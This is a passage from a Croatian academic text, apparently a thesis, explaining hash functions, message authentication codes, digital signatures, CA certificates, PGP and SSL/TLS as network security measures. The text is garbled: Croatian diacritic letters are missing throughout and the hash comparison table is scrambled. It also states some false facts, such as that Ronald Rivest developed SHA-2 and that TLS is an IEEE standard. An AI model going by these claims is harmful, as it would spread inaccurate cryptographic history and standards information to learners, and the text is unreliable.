Pojam autentinosti komunikatora (neporecivost) odnosi se na pitanje da li je stvarni

poiljatelj nekog sadraja onaj entitet za kojeg se u poruci tvrdi da jest, bez obzira radi li se o
fizikoj osobi ili dijelu opreme.
Samo privatni klju poiljatelja moe generirati potpis koji primatelj moe ovjeriti
poiljateljevim javnim kljuem te na taj nain pouzdano ustvrditi da je poruka poslana od dotine
osobe66.
Govori se i o autentinosti poruke67; poruka koju je primatelj primio je autentina ako je
njen sadraj jednak onome kojeg mu je poslao (uputio) poiljatelj, i ako je stvarni poiljatelj te
poruke onaj entitet za kojeg se u poruci tvrdi da jest. Dakle, poruka je autentina ako je sauvan
integritet njenog sadraja i ako dolazi od autentinog poiljatelja.
Primatelj treba openito imati mogunost provjeriti integritet poruke koju prima i
autentinost njenog (navodnog) poiljatelja. Dakle, prijenosni sustav treba omoguiti primatelju
poruke da utvrdi (prema Radovan, 2011:17):
-

da li je sadraj te poruke mijenjan u prijenosu, i

da li ta poruka zaista dolazi od onog entiteta od kojeg tvrdi da dolazi. Odreene


mogunosti takvih provjera trebale bi postojati na svim razinama mree, ali ostvarenje
takvih mogunosti iziskuje trokove i optereuje rad sustava. Zato se takve provjere
izvode uglavnom na viim razinama mrenog sustava.

4.2.1 Funkcija saimanja - Hash funkcija

Jedan od osnovnih elemenata u sustavima za utvrivanje integriteta poruka i autentinosti


komunikatora su hash funkcije (eng. hash functions). Hash funkcijom se openito naziva
65

Hadjina, N., (2009). Zatita i sigurnost informacijskih sustava (nastavni materijali sa zbirkom zadataka).
FER Zavod za primijenjeno raunarstvo,
http://www.smartgrids.hr/_download/repository/SkriptaZaStudente2009-12%5B1%5D.pdf. (preuzeto
26.03.2014.), str. 69.
66

Radovan, M., op. cit., str. 16.

67

loc. cit.

43

funkcija bilo kojeg algoritma koji iz podataka proizvoljne duine bitova izraunava niz bitova
fiksne duine68. Hash funkcija preslikava digitalni zapis (m) proizvoljne duine na jedan element
iz skupa nizova bitova stalne (zadane) duine. Naprimjer, hash funkcija MD5 preslikava sadraj
poruke od 72885 bitova na jedan niz od 128 bitova; ta funkcija preslikava i poruku od 33098
bitova na jedan niz od 128 bitova (Radovan, 2011:17).
Saimanje podataka postie se dakle primjenom funkcije rasprivanja (eng. hash
function). Funkcija rasprivanja H prima kao ulaz poruku m proizvoljne duljine i kao rezultat
stvara saetak h u obliku niza nula i jedinica:
h= H(m)
Vano svojstvo postupka saimanja je jednosmjernost, tj. nepostojanje obrnutog
postupka. Jednostavno je pomou funkcije rasprivanja iz m izraunati h, ali je raunski
neizvedivo iz h nai m. Drugo vano svojstvo je osjetljivost funkcije na promjenu ulaznog
podatka. Bilo kakva promjena ulaznog podatka znatno se odraava na rezultat, tj. rezultira posve
drukijim podacima na izlazu (prema Popovi, 2006:29).
4.2.1.1 MD5 (Message Digest version 5)

Najpoznatija hash funkcija je MD5 (Message Digest version 5); ta funkcija proizvodi
hash duine 128 bitova. Druga poznata hash funkcija je SHA-1 (Secure Hash Algorithm); ta
funkcija proizvodi hash duine 160 bitova. Slika u nastavku ilustrira uinak hash funkcije.

Slika 13: Preslikavanje sa hash funkcijom

Izvor: Radovan, M., (2011.) Raunalne mree (2). Digital point tiskara, Rijeka
Hash funkciju MD5 definirao je Ron Rivest, a opisana je u RFC 1321. Proces hashiranja
u sustavu MD5 sastoji se od etiri faze; prve tri faze moemo nazvati pripremnima; u etvrtoj

68

http://en.wikipedia.org/wiki/Hash_function. 05.03.2014., (preuzeto 14.03.2014.).

44

fazi cikliki se procesiraju blokovi od 128 bitova ulaznog sadraja m i na taj nain formira se
rezultat H(m) hashiranja poruke m, ija duina iznosi 128 bitova69.
Kao Internet standard koristio se u mnogim aplikacijama, esto kako bi se provjerio
integritet datoteka. Nakon otkria neotpornosti algoritma na koliziju, povuen je iz primjene70.
Hash funkcija preslikava nizove proizvoljne (velike) duine na nizove jednake (male)
duine; zato moraju postojati mnoge razliite poruke m1 i m2 za koje vrijedi da je
H(m1) = H(m2)
Ovdje je bitno da napada koji namjerno mijenja sadraj m1 u m2, ne moe namjestiti
m2 na nain da H(m2) bude jednako H(m1). To je najvanije svojstvo (ili cilj) dobre hash
funkcije (Radovan, 2011:18).
4.2.1.2 SHA porodica algoritama saimanja (Secure Hash Algorithm)

SHA porodica kriptografskih algoritama dizanirana je od strane amerike sigurnosne


agencije NSA (National Security Agency) kako bi poveala neprobojnost u odnosu na tada
najprihvaeniji MD5. SHA porodica ukljuuje SHA-0, SHA-1, SHA-2 i najnoviji SHA-371.
SHA-0 objavljen je samo nakratko; 1993. godine NSA ga je povukla zbog uoavanja
odreenih sigurnosnih problema72.
SHA je skraenica od engleske sloenice Secure Hash Algorithm i ime je za algoritam
koji slui za provjeru autentinosti datoteka ili poruke prilikom prijenosa izmeu poiljaoca i
primatelja. SHA-1 je nasljednik MD-5 i koristi se u raznim sigurnosnim programima ili u
protokomima kao to su: TLS, SSL, PGP, SSH, S/MIME i IPsec; generira hash duine 160
bitova. Openito vrijedi da dui hash (rezultat hashiranja) omoguava kvalitetniju kontrolu
integriteta poruke i autentinosti komunikatora, ako je proces (algoritam) hashiranja dobro
definiran; u suprotnom, sama duina hasha ne jami da je taj hash kvalitetan (prema Radovan,
2011:18).

69

Radovan, M., op. cit., str. 18.

70

CARNet CERT u suradnji s LS&S, (2009). TLS protokol. CCERT-PUBDOC-2009-03-257. Revizija 1.04.
http://security.lss.hr/documents/LinkedDocuments/CCERT-PUBDOC-2009-03-257.pdf. (preuzeto
07.04.2014.)., str. 7.
71

loc. cit.

72

RFC 6194. Security Considerations for the SHA-0 and SHA-1 Message-Digest Algorithms.
http://tools.ietf.org/html/rfc6194. (preuzeto 14.03.2014.)., str. 2.

45

SHA-1 je kompromitiran 2002. godine73, nakon ega je razvijena poboljana inaica SHA-2
(razvio Ronald rivest; do danas nema dokazanih sigurnosnih problema) 74. Postoje i SHA - 0 te
SHA 3 ije e sigurnosne performanse biti prikazane nie navedenom tablicom.
Tablica 1: Usporedba HASH algoritama

Algoritam i
njegove
varijante

Maksimalna
Interni hash

Veliina bloka

zbroj (bitovi)

(bitovi)

veliina
poruke
(bitovi)

Veliin

Prolasc

a izraza

i (pass,

(bitovi)

rounds)

Kompromitacija

Performanse
(MiB/s)

MD5

128

512

264 1

32

64

Da

335

SHA-0

160

512

264 1

32

80

Da

SHA-1

160

SHA224
SHA256
SHA384
SHA-

SHA-

512

512

2 1

32

80

Teoretski mogua - 261

192

512

264 1

32

64

Ne

139

1024

2128 1

64

80

Ne

154

64

24

Ne

224
256
384
512

SHA512/22

64

224

4
SHA512/25

256

SHA-3

224/256/384/512

1152/1088/832/576

Izvor: http://en.wikipedia.org/wiki/SHA-1 - prilagoeno


4.2.1.3 Klju autentikacije (Authentication key)

Autentikacija je postupak kojim se provjerava raunalni identitet subjekta. Postupkom


autentikacije provjerava se da li identitet kojim se subjekt predstavlja u raunalu doista odgovara
identitetu subjekta. Postupak autentikacije je sastavni dio postupka uspostave sigurnog
komunikacijskog kanala, gdje se provjerava da li identitet sudionika s kojim se komunicira zaista
73

Pseudokod SHA-1 hash algoritma razotkriven je i objavljen na Internetu; npr. na


http://en.wikipedia.org/wiki/SHA-1#SHA-1_pseudocode. (preuzeto 17.03.2014.).
74

http://hr.wikipedia.org/wiki/SHA-1. (preuzeto 06.03.2014.).

46

odgovara identitetu kojim se sudionik predstavlja i eli nastupati u komunikaciji. Provjera


raunalnog identiteta subjekta je zahtjevan zadatak koji obuhvaa autentikacijske protokole i
protokole zasnovane na kriptografiji (Popovi, 2006:24).
Napada moe presresti na putu proirenu poruku od poiljatelja A, zamijeniti njen
sadraj m1 sa sadrajem m2, izraunati H(m2) i zamijeniti njime H(m1) iz polazne poruke. Tako
izmijenjenu (novu) proirenu poruku (m2, H(m2)) napada prosljeuje primatelju B, pri emu u
novoj poruci navodi subjekt A kao poiljatelja te (nove) poruke (Radovan, 2011:19).
Ukoliko primatelj izvodi postupak provjere integriteta poruke, mogao bi pogreno
zakljuiti da sadraj kojeg je primio dolazi od poiljatelja A i da nije mijenjan u prijenosu.
Opisani problem rjeava se na taj nain da komunikatori dogovore jedan niz bitova s, koji
je poznat samo njima i kojeg se naziva kljuem autentikacije75 (authentication key). Primjena
toga kljua omoguava primatelju da utvrdi da li je sadraj kojeg prima iskrivljen u procesu
prijenosa, odnosno da li je naruen integritet poruke. Uz upotrebu kljua autentikacije, proces
slanja i primanja sadraja izvodi se na slijedei nain (prema Radovan, 2011:19):
(1) Poiljatelj A dodaje klju autentikacije s poruci m koju treba poslati primatelju B, i
izraunava H(m+s). Takav hash poruke kojoj je dodan klju autentikacije, naziva se kodom
autentikacije poruke (eng. message authentication code - MAC).
(2) Poiljatelj A alje primatelju B proirenu poruku (m, H(m+s)).
(3) Primatelj B prima proirenu poruku oblika (m, h). B uzima sadraj m iz primljene
poruke i posjeduje klju s; iz tih vrijednosti, B izraunava H(m+s). Ako je rezultat tog raunanja
jednak hashu h kojeg je B dobio u poruci od A, onda B moe biti siguran da je integritet te
poruke sauvan u procesu prijenosa.
U gornjoj situaciji primatelj B moe biti siguran da je sadraj kojeg je primio od A jednak
sadraju kojeg mu je A poslao. kao i da poruka dolazi od poiljatelja A tj. moe utvrditi
autentinost poiljatelja poruke.
Provjera integriteta i autentinosti poiljatelja poruke zasnovana je na primjeni tajnog
kljua autentikacije. Napada moe presresti poruku m1 i promijeniti njen sadraj u m2, ali ne
moe izraunati hash H(m2+s) jer ne poznaje klju autentikacije s.
Ako hash kojeg primatelj izrauna (na nain kako je opisano iznad) nije jednak
primljenoj vrijednosti hasha, onda primatelj zna da je poruka mijenjana, ili da ta poruka ne dolazi
od autentinog poiljatelja (koji se u njoj navodi). Tada primatelj odbacuje takvu poruku, jer njen
75

Radovan, M., op. cit., str. 19.

47

sadraj moe biti mijenjan ili poslan od strane napadaa, i vjerojatno je tetan (Radovan,
2011:20).
Zakljuno, klju autentikacije omoguava primatelju poruke da otkrije potencijalni napad
i da se zatiti od posljedica iskrivljenih poruka njihovim odbacivanjem. Takoer, omoguava mu
i da nesporno utvrdi identitet poiljatelja poruke.
4.2.2 Digitalni potpis (Digital signature)

Zatita nepovredivosti podataka postie se digitalnim potpisivanjem podataka. Podaci


koji se nastoje digitalno potpisati saimaju se uporabom funkcije rasprivanja. Saetak poruke
kriptira se tajnim kljuem poiljatelja poruke i zajedno s izvornim podacima alje se primatelju.
Saetak poruke kriptiran tajnim kljuem i izvorna poruka ine digitalno potpisanu poruku
(Popovi, 2006:23).
Digitalni potpis predstavlja matematiku shemu koja omoguuje provjeru autentinosti
poruke ili dokumenta76. Sustav digitalnog potpisa je jedan kriptografski sustav koji omoguava
da subjekt potpisuje sadraje koji su zapisani u digitalnom obliku i koji se prenose raunalnom
mreom (zajedno sa potpisom). Digitalni potpis treba biti nekrivotvorljiv, autentian a usto i
neizmjenjiv, sa nemogunou ponovne uporabljivosti (prema Hadjina, 2009:122).
U sustavu ifriranja koji koristi javni i privatni klju, jedan par javnog i pripadnog
privatnog kljua pripada jednom korisniku. Zato svaki takav par kljueva moe imati ulogu
jednoznanog identifikatora jednog subjekta u prostoru digitalne (mrene) komunikacije. U
sustavu za ifriranje s javnim kljuem KA+ i privatnim kljuem KA- vrijedi slijedei odnos:
KA-(KA+(m)) = KA+(KA-(m)) = m77
Prvi element gornjeg stavka kae slijedee: ifrirani zapis poruke m, koja je ifrirana s
javnim kljuem KA+ subjekta A, deifrira se sa pripadnim privatnim kljuem K A- od A; na taj
nain dobiva se izvorni (itljivi) zapis sadraja poruke m (Radovan, 2011:21).
Drugi element gornjeg stavka kae slijedee: ifrirani zapis poruke m, koja je ifrirana s
privatnim kljuem KA- subjekta A, deifrira se sa pripadnim javnim kljuem K A+ od A; na taj
nain dobiva se izvorni (itljivi) zapis sadraja poruke m (Radovan, 2011).

76

Antoli,K. i dr., op. cit., str. 161.

77

Radovan, M., op. cit., str. 21.

48

Dakle, sadraj ifriran javnim kljuem deifrira se pripadajuim privatnim kljuem, a


onaj ifriran privatnim kljuem moe se deifrirati javnim kljuem iz ega proizlazi da se
digitalni potpis zapravo kreira uporabom para kljueva (javni i privatni).
Poiljatelj A ifrira sadraj m sa svojim privatnim kljuem KA- i alje ifrirani zapis K A(m) primatelju B. Primatelj B deifrira taj zapis pomou javnog kljua K A+ od A i dobiva izvorni
zapis sadraja m. Ovo ifriranje nema za cilj zatitu povjerljivosti sadraja, ve je bitno to da
uspjeno deifriranje nekog zapisa pomou javnog kljua KA+ pokazuje da je taj zapis proizveden
ifriranjem sa privatnim kljuem KA-, koji pripada subjektu A kojega ujedno oznauje kao
vlasnika potpisnika.
Kriptografski sustav sa javnim kljuem omoguava postizanje vie dobrih uinaka na
osnovu samo jednog postupka: ifriranja sadraja sa privatnim kljuem poiljatelja. Meutim,
takav kriptografski sustav je procesno vrlo zahtjevan jer ukljuuje ogromnu koliinu raunanja
sa ogromnim brojevima; zato je takav sustav ifriranja spor, posebno kod slanja veih sadraja.
Ranije je spomenuto da sustav sa javnim kljuem RSA ifrira sadraje od sto do deset tisua puta
sporije nego to to ini sustav sa jednim (simetrinim, tajnim) kljuem, kakav je sustav DES
(Radovan, 2011:22).
Taj problem rijeen je ovdje na slijedei nain. Za digitalni potpis nekog sadraja
(poruke) nije neophodno ifrirati sav taj sadraj sa privatnim kljuem poiljatelja. Umjesto toga,
dovoljno je da poiljatelj napravi hash svog sadraja (poruke) i da onda taj hash ifrira sa svojim
privatnim kljuem. Tada hash poruke m ifriran sa privatnim kljuem poiljatelja A, ima
ulogu digitalnog potpisa poruke m, sa kojim A potpisuje njen sadraj78.
U sustavu digitalnog potpisa, hash svake poruke ima daleko manje bitova nego to ih ima
sama poruka, koja moe sadravati tisue ili milijune bitova, ili jo vie od toga. Zato RSA
ifriranje hasha H(m) poruke m troi daleko manje vremena nego to troi ifriranje cijele poruke
m (Radovan, 2011:22).

Slika 14: Proces izrade digitalnog potpisa poruke


78

ibid. 22.

49

Izvor: Radovan, M., (2011.) Raunalne mree (2). Digital point tiskara, Rijeka
Potpisnik A potpisuje sadraj (poruku) m na slijedei nain (prema Radovan, 2011.):
(1) Uzima sadraj m kojeg eli potpisati, i izraunava hash H(m) tog sadraja.
(2) ifrira hash sadraja sa svojim privatnim kljuem; dakle, proizvodi KA-(H(m)).
(3) alje primatelju sadraj m i ifrirani hash toga sadraja; dakle, alje par (m, KA(H(m))).
Hash poruke m, ifriran sa privatnim kljuem od A - dakle, zapis K A-(H(m)) - naziva se
digitalnim potpisom (digital signature) poruke m od strane subjekta A.
Dakle, ulogu digitalnog potpisa poiljatelja A moe imati ifrirani zapis cijele poruke m,
pri emu je taj ifrirani zapis proizveden uz upotrebu privatnog kljua od A. Ali digitalnim
potpisom poiljatelja A poruke m naziva se ifrirani zapis hasha poruke m, koji je proizveden
uz upotrebu privatnog kljua poiljatelja A; dakle, zapis oblika KA-(H(m))79.
Primatelj B prima sadraj poruke m zajedno sa ifriranim zapisom hasha te poruke, koji je
ifriran sa privatnim kljuem poiljatelja A; dakle, prima par (m, K A-(H(m))). Primatelj B na to
izvodi slijedei proces (prema Radovan, 2011:23):
(1) Pokree sustav za deifriranje (RSA) i zadaje mu primljeni ifrirani sadraj hasha
poruke (dakle, KA-(H(m))) i javni klju KA+ od poiljatelja A. Sustav iz toga proizvodi hash H(m)
poruke m.
(2) Primatelj B uzima itljivu poruku m koju je primio od poiljatelja A i izraunava njen
hash H(m).

79

ibid. 23.

50

(3) Ako je rezultat koji je dobiven u koraku (1) jednak rezultatu koji je dobiven u koraku
(2), onda primatelj B moe biti siguran u integritet primljene poruke (nije iskrivljena u
prijenosu), kao i da je autentini autor te poruke A. Ako rezultati koji su dobiveni u (1) i u (2)
nisu jednaki, onda je sadraj izvorne poruke mijenjan, ili se poiljatelj poruke lano predstavlja,
ili oboje.
Slika 15: Utvrivanje autentinosti potpisa i integriteta poruke

Izvor: Radovan, M., (2011.) Raunalne mree (2). Digital point tiskara, Rijeka
4.2.2.1 CA certifikat

Uvoenjem asimetrine kriptografije javnih kljueva javlja se problem objave javnih


kljueva, tj. povjerenja u javno objavljene kljueve. Problem se rjeava uvoenjem tzv.
vjerodajnica (eng. credential) koje izdaje povjerljiva trea strana. Vjerodajnice obuhvaaju skup
podatka o vlasniku iju vjerodostojnost jami izdavatelj. Javni kljuevi obino se objavljuju
vjerodajnicama u obliku iskaznice (eng. certificates). U najjednostavnijem obliku iskaznica je
podatkovna struktura koja sadri dvije vrste informacija: identitet vlasnika iskaznice te javnog
kljua vlasnika iskaznice (Popovi, 2006:24).
Za uspostavu sustava povjerenja kljuno je da u njemu postoji barem jedan entitet kojem
vjeruju svi korisnici sustava (Antoli, 2010). Ovdje kljunu ulogu igra PKI infrastruktura (eng.
Public Key Infrastructure - PKI) ili infrastruktura javnog kljua, koja predstavlja vrlo sloen
sustav temeljen na asimetrinoj kriptografiji. PKI objedinjuje certifikate, certifikacijski centar,
spremnik certifikata i opozvanih certifikata, korisnike certifikata, te sve njihove meusobne
interakcije (interakcije izmeu pojedinih elemenata sustava). Njegova osnovna namjena je

51

sigurna komunikacija preko nesigurnih kanala. Tu ulogu unutar PKI infrastrukture preuzima
certifikacijski centar CA (eng. Certificate Authority) koji je odgovoran za izdavanje digitalnih
certifikata koji e omoguiti povezivanje digitalnih identiteta korisnika s njihovim stvarnim
identitetom. Upravo je digitalni certifikat koji kreira i potpisuje CA entitet kojem vjeruju svi
korisnici unutar sustava te ja na taj nain omoguena jednoznana identifikacija i autentifikacija
korisnika80.
CA izdaje potvrde (certifikate) sa kojima potvruje da je dani entitet (osoba, tvrtka,
usmjeriva, server) zaista onaj koji taj entitet tvrdi da jest. Ili pokuajmo to rei ovako: ovjerovna
sluba daje potvrde na kojima pie tko je (u stvarnosti) vlasnik te potvrde. Procedura
utvrivanja stvarnog identiteta nekog entiteta nije precizno pretpisana; preostaje nadati se da
certifikacijski centar radi svoj posao savjesno i uspjeno. On moe spadati u sastav dravnih
slubi (dravne administracije), ili bi njegov rad trebao podlijegati nadzoru dravnih slubi81.
Najire primjenjivani oblik iskaznica na Internetu je X.509 - standard koji odreuje nain
izdavanja i sadraj iskaznica (Popovi, 2006:24).
Ako dakle A eli stupiti u komunikaciju sa B, onda A alje B svoj CA certifikat. B uzima
javni klju KCA+ od ovjerovne slube i deifrira CA certifikat kojeg mu je poslao A. Tako B moe
saznati sve relevantne podatke o A, koji su zapisani u njegovom CA certifikatu (Radovan,
2011.).
Dakle, CA certifikati omoguuju komunikatorima meusobno upoznavanje prije
razmjene poruka, i to temeljem sadraja koji su zapisani u njihovim CA certifikatima. Glavnu
ulogu meu tim sadrajima ima javni klju odreenog subjektu, koji ujedno posjeduje i
pripadajui privatni klju.
CA certifikati su toliko dobri i pouzdani koliko je dobra i pouzdana sluba koja ih izdaje.
Kae se da korisnici trebaju imati povjerenja u ovjerovnu slubu (CA); u stvari, korisnici nemaju
drugog izbora nego imati povjerenja u tu slubu i u njene CA certifikate, jer nemaju neke druge
(bolje) mogunosti (Radovan, 2011:25).
4.2.3 Sigurnost na razinama slojeva OSI modela

Implementaciju mjera mrene sigurnosti najbolje je razmatrati po razinama OSI modela


(potpoglavlje 2.2.1).
80

Antoli,K. i dr., op. cit., str. 166.

81

Radovan, M., op. cit., str. 24.

52

Protokoli i sustavi sigurnosti i zatite mogu se implementirati na svakoj od razina


raunalne mree iznad fizikog sloja; dakle, na razini veze podataka, na mrenoj razini, na
transportnoj razini, i na razini aplikacija 82. Ako se sustav sigurnosti ostvaruje (to jest, definira i
realizira) na razini aplikacija, onda se ostvaruje za svaku aplikaciju posebno. Podsustav
sigurnosti i zatite se tada oblikuje u skladu s potrebama dane aplikacije i moe se smatrati
dijelom (podsustavom) te aplikacije.
Sustav sigurnosti i zatite moe se ostvariti na transportnoj razini, u okviru pojedinanih
protokola toga sloja; kod Interneta su to prvenstveno protokoli TCP i UDP. Kad se sigurnost
ostvaruje u okviru transportnog protokola, onda sve aplikacije koje koriste prijenosne usluge
toga protokola, dobivaju time i usluge sigurnosti i zatite koje prua taj protokol transportne
razine (prema Radovan, 2011:28).
Sustav sigurnosti i zatite moe biti uspostavljen i na mrenoj razini raunalne mree.
Tada protokol mrene razine (ovdje IP) prua svoje usluge sigurnosti i zatite svim protokolima
transportne razine, a time i svim protokolima i sustavima aplikacijske razine (prema Radovan,
2011:28).
Sustav sigurnosti i zatite moe se ostvariti i na razini veze podataka. Tada uinci sustava
sigurnosti i zatite tite i prijenos na mrenoj razini; time se onda titi i prijenos na transportnoj
razini, a time i rad svih aplikacija (Radovan, 2011:28).
Vidljivo je da se ovdje postavlja pitanje na koji nain oblikovati podsustav sigurnosti u
vieslojnom sustavu kao to je raunalna mrea, npr. da li takav sustav sigurnosti i zatite treba
biti postavljen samo na jednoj razini, ili na vie njih odnosno na tono kojoj.
ini se da bi bilo najbolje uspostaviti sustav sigurnosti na niim razinama mree, i time
ostvariti sigurnost i za vie razine mrenog sustava, ukljuujui sve mrene aplikacije, no to je u
praksi nemogue budui da oni oblici sigurnosti i zatite koji se mogu ostvariti na niim
razinama mree, ne udovoljavaju svim sigurnosnim potrebama viih razina mrenog sustava,
posebno ne specifinim potrebama pojedinih aplikacija. Naprimjer, onaj sustav sigurnosti koji je
definiran (i radi) na razini veze podataka (sa okvirima) ili na mrenoj razini (sa IP paketima),
nije pogodan za utvrivanje autentinosti komunikatora i integriteta poruka na razini aplikacija.
Ti oblici sigurnosti i zatite na aplikacijskoj razini su posebno vani za web aplikacije koje
izvode poslove trgovanja i financijskih transakcija preko web sjedita (prema Radovan,
2011:28).

82

ibid. 28.

53

Zato se sustavi sigurnosti i zatite redovito definiraju i realiziraju na viim razinama


raunalne mree, bez obzira na to da li se na niim razinama provode neki oblici sigurnosti i
zatite, ili se ne provode (Radovan, 2011:28).
Ovdje emo razmotriti neke uinkovite sustave zatite koji se implementiraju na
aplikacijskoj, transportnoj, mrenoj i niim razinama.
4.2.3.1 Sigurnost na razini aplikacija

Aplikacijski sloj najvia je razina OSI modela koji prua mrene usluge svim
aplikacijama a njegova sigurnost poglavito se odnosi na metode zatite web aplikacija od
neovlatenog pristupanja i napada. Sve sofisticiraniji napadi ipak su jo uvijek usredotoeni na
tri kljune slabosti raunalnih sustava83:
-

aktualni akreditivi sustava (individualna i dijeljena korisnika imena i lozinke i ine


vjerodajnice);

aplikacije nezatiene od napada SQL ubrizgavanjem (eng. SQL injection attack);

slabo ili nikako konfigurirane aplikacije, mrene ili sistemske komponente.

Meutim, upamtimo dobro rezultate pojedinih istraivanja:


-

92% svih ranjivosti je u softveru84;

75% svih napada dogaa se u aplikacijskom sloju85

Aplikacijski sloj sadri brojne komunikacijske protokole od kojih su neki od najvanijih


HTTP, FTP, DNS, SMTP, SNMP, telnet itd.
Postupak fomiranja podatkovnih paketa odvija se po slojevima. Na aplikacijskom sloju
jedinica informacije naziva se podatak (data). Podatak na prijenosnom sloju dobiva zaglavlje
jednog od prijenosnih protokola ime postaje segment. IP protokol na segment dodaje svoje
zaglavlje formirajui paket, te ga proslijeuje sloju pristupa mrei. Na naim lokalnim mreama
najee koristimo Ethernet/FastEthernet protokol koji dodavanjem svog zaglavlja stvara okvir
(frame). Okvir se na fiziki medij alje bit po bit86.
83

Holl, K. (2003). Global Information Assurance Certification Paper. SANS Institute, str. 14-16.

84

NIST (National Institute of Standards and Technology, US Department of Commerce), prilagoeno


07.04.2014.
85

GARTNER Inc., USA, prilagoeno 07.04.2014.

86

Sartori, L. (2005). Pregled referentnih modela komunikacijskih protokola. Sveuilini raunski centar
Zagreb. (preuzeto 17.03.2014.).

54

Kao primjer sigurnosnog sustava primjenjivog na aplikacijskoj razini valja navesti PGP
sustav (eng. pretty good privacy - prilino dobra privatnost) koji predstavlja dominantan sustav
sigurnosti i zatite komunikacije u sustavu raunalne pote. Postoji vie verzija sustava PGP i
vie softverskih implementacija toga sustava. U sutini, PGP se sastoji od elemenata kao i
digitalni potpis (potpoglavlje 4.2.2), i funkcionira na slian nain. Zavisno od verzije, PGP
sustav (kao konkretna softverska implementacija) koristi MD5 i SHA funkcije (algoritme) za
izraunavanje hasha (saetaka) H(m) poruke m. Za ifriranje sa simetrinim kljuem koristi
algoritme 3DES, IDEA i CAST. Za ifriranje sa javnim kljuem koristi algoritam RSA
(Radovan, 2011:36).
Dakle, sustav PGP, kreira za korisnika jedan javni klju i pripadajui privatni klju.
Privatni klju korisnika zatien je lozinkom koju korisnik unosi kod njegove uporabe. Dodatni
element zatite je nepoznata lokacija fizikog zapisa privatnog kljua koja moe biti na raunalu
korisnika ili pak na nekom PGP serveru, odnosno na sasvim drugoj lokaciji.
PGP omoguava korisniku ifriranje sadraja poruke, digitalno potpisivanje sadraja
poruke, i oboje da ifrira i digitalno potpie poruku (prema Radovan, 2011:36).
ifrirane i/ili digitalno potpisane poruke raunalne pote prenose se u standardnom
formatu MIME87, u kojem se inae prenose poruke raunalne pote. ifrirani i/ili potpisani
sadraj poruke postaje sadraj u MIME formatu zapisa poruke raunalne pote i smjeta se iza
MIME zaglavlja te poruke. Takva poruka moe sadravati razumljiv ili nerazumljiv sadraj
(zavisno da li je ifrirana), i nerazumljiv niz znakova, koji je digitalni potpis (ako je poruka
digitalno potpisana) (Radovan, 2011:36).
Dakle, onaj zapis poruke raunalne pote kojeg proizvodi PGP sustav smjeta se u MIME
format kao sadraj ili tijelo MIME zapisa poruke raunalne pote, koju sustav raunalne pote
prenosi od poiljatelja do primatelja. Poetak toga tijela oznaen je sa retkom
----- BEGIN PGP MESSAGE ----a zavretak tijela oznaen je sa retkom
----- END PGP MESSAGE -----

87

MIME (Multipurpose Internet Mail Extension) je proirenje SMTP protokola koje omoguava prijenos
non-ASCII sadraja u e-mail poruci. Omoguava e-mail poruci da sadri vie objekata u jednom tijelu,
tekst bez ogranienja u duini linija i ukupnoj duini, skup karaktera razliit od ASCII, razliite fontove,
binarne datoteke i multimedijalne poruke (slike, audio, video). Moemo ga zamisliti kao skup funkcija za
konverziju ne-ASCII podataka u ASCII i obrnuto., http://hr.wikipedia.org/wiki/MIME. 20.03.2013, (preuzeto
15.02.2014.).

55

Oznake poetka i zavretka mogu varirati u zavisnosti od toga koje su operacije


(ifriranje, potpis) izvedene na izvornoj poruci, kao i od verzije sustava PGP.
Sustav PGP ima vlastiti sustav ovjeravanja javnih kljueva koji se razlikuje od sustava
CA a omoguuje korisnicima ovjeravanje svojih javnih kljueva i njihovu distribuciju na razne
naine.
4.2.3.2 Sigurnost na transportnoj razini

Ukratko, sigurnost i zatitu na transportnoj razini ostvaruje se na taj nain da se funkcije


TCP protokola "dopune" sa onim elementima (sustavima) koji ostvaruju sigurnost i zatitu
komunikacije; dakle, omoguuju zatitu povjerljivosti, utvrivanje autentinost i provjeru
integriteta. Time se sigurnost i zatita ostvaruje za sve aplikacije koje koriste usluge prijenosa od
tako dopunjenog TCP protokola (Radovan, 2011:37).
Tako "dopunjena" verzija (eng. enhanced version) TCP protokola naziva se slojem
sigurnih utinica (eng. secure sockets layer - SSL). Neto izmijenjen SSL (verzija 3) nazvan je
imenom sigurnost transportnog sloja (eng. transport layer security - TLS) i standardiziran je
kao IEEE88 standard, koji je definiran u RFC 2246.
TLS protokol radi na slojevima ispod aplikacijskih protokola poput HTTP, FTP, SMTP,
NNTP i XMPP, ali i iznad pouzdanih protokola transportnog sloja poput TCP protokola.
Smjetaj protokola TLS u OSI modelu, na 5 i 6 sloju, prikazuje slika 3. Budui da moe dodati
sigurnost bilo kojem protokolu koji koristi pouzdane veze, esto se koristi u kombinaciji s HTTP
protokolom kako bi se dobio HTTPS protokol. Dobiveni protokol koristi se za osiguravanje Web
stranica na kojima se nalaze aplikacije namijenjene elektronikom poslovanju i upravljanju
imovinom89.
Ovdje e se opisati sigurnosni sustav SSL kojim obino komuniciraju Web preglednici i
web serveri. To znai da sa svojim utinicama (eng. socket) nisu vezani izravno na TCP
protokol, nego na SSL meusloj. Na taj nain se idalje koriste usluge prijenosa putem TCP

88

Institute of Electrical and Electronics Engineers ili IEEE je meuarodna neprofitna profesionalna
organizacija za uznapredovanje tehnologije vezane sa elektricitetom. Ima vie lanova od bilo koje druge
profesionalne tehnike organizacije na svijetu, vie od 360 000 u 175 zemalja,
http://hr.wikipedia.org/wiki/Institute_of_Electrical_and_Electronics_Engineers. 11.03.2013, (preuzeto
15.03.2014.).
89

CARNet CERT u suradnji s LS&S, (2009). TLS protokol. CCERT-PUBDOC-2009-03-257. Revizija 1.04.
http://security.lss.hr/documents/LinkedDocuments/CCERT-PUBDOC-2009-03-257.pdf. (preuzeto
07.04.2014.)., str. 10.

56

protokola ali posredno, preko SSL-a. Trgovina, financijske transakcije, kartino poslovanje i
openito svi povjerljivi sadraji koriste SSL.
Kad web sjedite koristi SSL, onda to ini i HTTP protokol koji izvodi operacije
prijenosa sadraja za to sjedite. Kae se da URL adresa takvih sjedita poinje sa oznakom
"https" (umjesto sa "http"); dodatni znak "s" pokazuje da se komunikacija sa tom web (URL)
adresom odvija preko sloja SSL i da je prema tome sigurna i zatiena. Znak "s" moe biti
pokazatelj da neka aplikacija (web sjedite) koristi SSL, ali nepostojanje spomenutog znaka "s" u
URL adresi ne znai da ta aplikacija ne koristi SSL (Radovan, 2011:37).
Sigurnost i zatita su posebno vani za poslovanje preko Interneta. Bez odgovarajueg
sustava sigurnosti i zatite, napadai bi mogli ometati takvo poslovanje i praviti bitne tete
drugima, zato da donesu korist sebi, ili za zabavu.
Ako se u poslovnoj komunikaciji ne bi koristila enkripcija napadai bi mogli presretati
razne narudbe i uzimati iz njih podatke o kreditnim karticama naruitelja te vriti tako kupovinu
